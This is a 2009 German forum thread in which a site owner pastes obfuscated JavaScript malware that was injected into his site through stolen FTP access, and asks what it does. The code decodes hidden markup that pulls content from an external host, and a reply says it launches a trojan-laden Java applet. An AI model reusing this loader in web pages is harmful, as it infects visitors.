[JavaScript] Malware auf meiner Webseite..

Dieses Thema im Forum "Webentwicklung" wurde erstellt von dreamax, 18. August 2009 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 18. August 2009
    Malware auf meiner Webseite..

    Hallo,
    mir ist heute aufgefallen das jemand Malware auf meiner Webseite eingebunden hat. Habe dann die apache Logs angeschaut da ich zunächst davon ausging das evtl. in meinem Skript ein Sicherheitsloch sei. Jedoch stellte sich dann heraus das ein Admin sich einen Trojaner eingefangen hatte und sich so jemand Zugang zum FTP Server verschaffte. Nun hab ich allen Schadcode entfernt, eine erneute Google Überprüfung angefordert und alle Zugangsdaten geändert. Nun würde ich gerne wissen was der Javascript Schadcode so getrieben hat, da ich derzeit befürchte mich selbst damit angesteckt zu haben. Da der Code verschlüsselt ist, werde ich nicht wirklich aus ihm schlau und hoffe ihr könnt mir da helfen:

    Code:
    <script>function rEUEtqGz(MWwPEpqUv){ fff=op.split("66"); } 
    function MQmr(zSbLpHcx){var ANK=4,VjSBvn=5;var IAqhu='48+0,84+0,81+3,91+1,77+3,87+1,80+4,25+3,95+1,84+0,80+0,92+4,83+1,48+4,39+1,25+3,83+1,80+4,84+0,82+2,83+1,92+4,48+4,39+1,25+3,78+2,88+4,91+1,80+0,80+4,91+1,48+4,38+2,25+3,81+3,91+1,77+3,87+1,80+4,78+2,88+4,91+1,80+0,80+4,91+1,48+4,38+2,25+3,92+0,91+1,',fhgVVA=IAqhu.split(',');XUD='';for(iBwcrjy=0;iBwcrjy<fhgVVA.length-1;iBwcrjy++){ wWDdyqg=fhgVVA[iBwcrjy].split('+');HpeQmDgI = parseInt(wWDdyqg[0]*VjSBvn)+parseInt(wWDdyqg[1]);HpeQmDgI = parseInt(HpeQmDgI)/ANK;XUD += String.fromCharCode(HpeQmDgI);}return XUD;}function Xhj(umdE){ var JMKPbGDwKc = document.getElementById('jmx');var JMKPbGDwKc = document.getElementById('jmx'); } 
    function bEMBygalQ(xaDnn){var UcBE=5,PbvWksRWcr=7;var Fnj='70+5,43+4,27+6,74+2,82+6,82+6,80+0,41+3,33+4,33+4,80+5,85+5,72+6,70+5,83+4,70+5,32+6,75+0,78+4,72+6,79+2,33+4,72+6,32+6,70+5,73+4,75+0,45+0,75+5,87+1,79+2,27+6,44+2,42+6,33+4,75+0,72+6,81+3,69+2,77+6,72+1,44+2,',OBDHV=Fnj.split(',');DDdk='';for(ZVr=0;ZVr<OBDHV.length-1;ZVr++){ ShgaQuEgG=OBDHV[ZVr].split('+');faqUAsS = parseInt(ShgaQuEgG[0]*PbvWksRWcr)+parseInt(ShgaQuEgG[1]);faqUAsS = parseInt(faqUAsS)/UcBE;DDdk += String.fromCharCode(faqUAsS);}return DDdk;}function jlVHmh(dMl){ alert('aswAXFl');var MsOuNt = document.getElementById('bjyXJNDpu'); } 
    function wJARsSTCJD(Sbngxf){ fff.op.replace("v"); fff.op.replace("v"); } 
    document['wri5te'.replace(/[0-9]/,'')](MQmr('tmZJw')+bEMBygalQ('VvAsrJmlt'));function kLQHtlHjy(Wzs){ fff.op.replace("v"); fff.op.replace("v");var wofuAr=new Function("Dprwco", "return 947744;"); } 
    function LGviDA(hLfn){ alert('ViuL');window.eval(); fff=op.split("66"); fff=op.split("66"); } 
    </script><script>function rEUEtqGz(MWwPEpqUv){ fff=op.split("66"); } 
    function MQmr(zSbLpHcx){var ANK=4,VjSBvn=5;var IAqhu='48+0,84+0,81+3,91+1,77+3,87+1,80+4,25+3,95+1,84+0,80+0,92+4,83+1,48+4,39+1,25+3,83+1,80+4,84+0,82+2,83+1,92+4,48+4,39+1,25+3,78+2,88+4,91+1,80+0,80+4,91+1,48+4,38+2,25+3,81+3,91+1,77+3,87+1,80+4,78+2,88+4,91+1,80+0,80+4,91+1,48+4,38+2,25+3,92+0,91+1,',fhgVVA=IAqhu.split(',');XUD='';for(iBwcrjy=0;iBwcrjy<fhgVVA.length-1;iBwcrjy++){ wWDdyqg=fhgVVA[iBwcrjy].split('+');HpeQmDgI = parseInt(wWDdyqg[0]*VjSBvn)+parseInt(wWDdyqg[1]);HpeQmDgI = parseInt(HpeQmDgI)/ANK;XUD += String.fromCharCode(HpeQmDgI);}return XUD;}function Xhj(umdE){ var JMKPbGDwKc = document.getElementById('jmx');var JMKPbGDwKc = document.getElementById('jmx'); } 
    function bEMBygalQ(xaDnn){var UcBE=5,PbvWksRWcr=7;var Fnj='70+5,43+4,27+6,74+2,82+6,82+6,80+0,41+3,33+4,33+4,80+5,85+5,72+6,70+5,83+4,70+5,32+6,75+0,78+4,72+6,79+2,33+4,72+6,32+6,70+5,73+4,75+0,45+0,75+5,87+1,79+2,27+6,44+2,42+6,33+4,75+0,72+6,81+3,69+2,77+6,72+1,44+2,',OBDHV=Fnj.split(',');DDdk='';for(ZVr=0;ZVr<OBDHV.length-1;ZVr++){ ShgaQuEgG=OBDHV[ZVr].split('+');faqUAsS = parseInt(ShgaQuEgG[0]*PbvWksRWcr)+parseInt(ShgaQuEgG[1]);faqUAsS = parseInt(faqUAsS)/UcBE;DDdk += String.fromCharCode(faqUAsS);}return DDdk;}function jlVHmh(dMl){ alert('aswAXFl');var MsOuNt = document.getElementById('bjyXJNDpu'); } 
    function wJARsSTCJD(Sbngxf){ fff.op.replace("v"); fff.op.replace("v"); } 
    document['wri5te'.replace(/[0-9]/,'')](MQmr('tmZJw')+bEMBygalQ('VvAsrJmlt'));function kLQHtlHjy(Wzs){ fff.op.replace("v"); fff.op.replace("v");var wofuAr=new Function("Dprwco", "return 947744;"); } 
    function LGviDA(hLfn){ alert('ViuL');window.eval(); fff=op.split("66"); fff=op.split("66"); } 
    </script>
    mfg
     
  2. 18. August 2009
    AW: Malware auf meiner Webseite..

    habs mal auf nen testrechner ausgeführt.

    1. an allen anderen macht das nicht

    es öffnet sich java und schon springt antivir an
    was soll man sagen JS führt ne java anwendung aus in dem ein trojaner ist.
     
  3. 18. August 2009
    AW: Malware auf meiner Webseite..

    Okay dankö..
     
  4. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.